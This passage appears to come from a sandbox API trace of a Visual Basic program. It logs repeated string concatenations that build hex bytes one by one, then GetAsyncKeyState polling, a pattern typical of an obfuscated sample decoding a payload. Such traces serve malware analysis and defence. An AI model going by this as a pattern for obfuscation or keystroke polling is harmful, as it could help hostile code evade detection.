[0103.650] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&Hb", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&Hc", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&Hb", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H0", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.651] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.651] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&H8", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&H5", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.652] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H6", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H4", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&Hc", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.653] VarBstrCat (in: bstrLeft="&H8", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.654] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.654] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.654] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.654] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.654] VarBstrCat (in: bstrLeft="&H2", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.654] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.654] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.654] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.654] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.654] VarBstrCat (in: bstrLeft="&H5", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.654] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.654] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.654] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.655] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.656] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.657] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.658] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.659] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.660] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.661] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.736] GetAsyncKeyState (vKey=3) returned 0 [0104.053] GetAsyncKeyState (vKey=3) returned 0 [0104.236] GetAsyncKeyState (vKey=3) returned 0 [0104.536] GetAsyncKeyState (vKey=3) returned 0 [0104.879] GetAsyncKeyState (vKey=3) returned 0 [0105.097] GetAsyncKeyState (vKey=3) returned 0 [0105.409] GetAsyncKeyState (vKey=3) returned 0 [0105.684] GetAsyncKeyState (vKey=3) returned 0 [0106.144] GetAsyncKeyState (vKey=3) returned 0 [0106.372] GetAsyncKeyState (vKey=3) returned 0 [0106.616] GetAsyncKeyState (vKey=3) returned 0 [0106.833] GetAsyncKeyState (vKey=3) 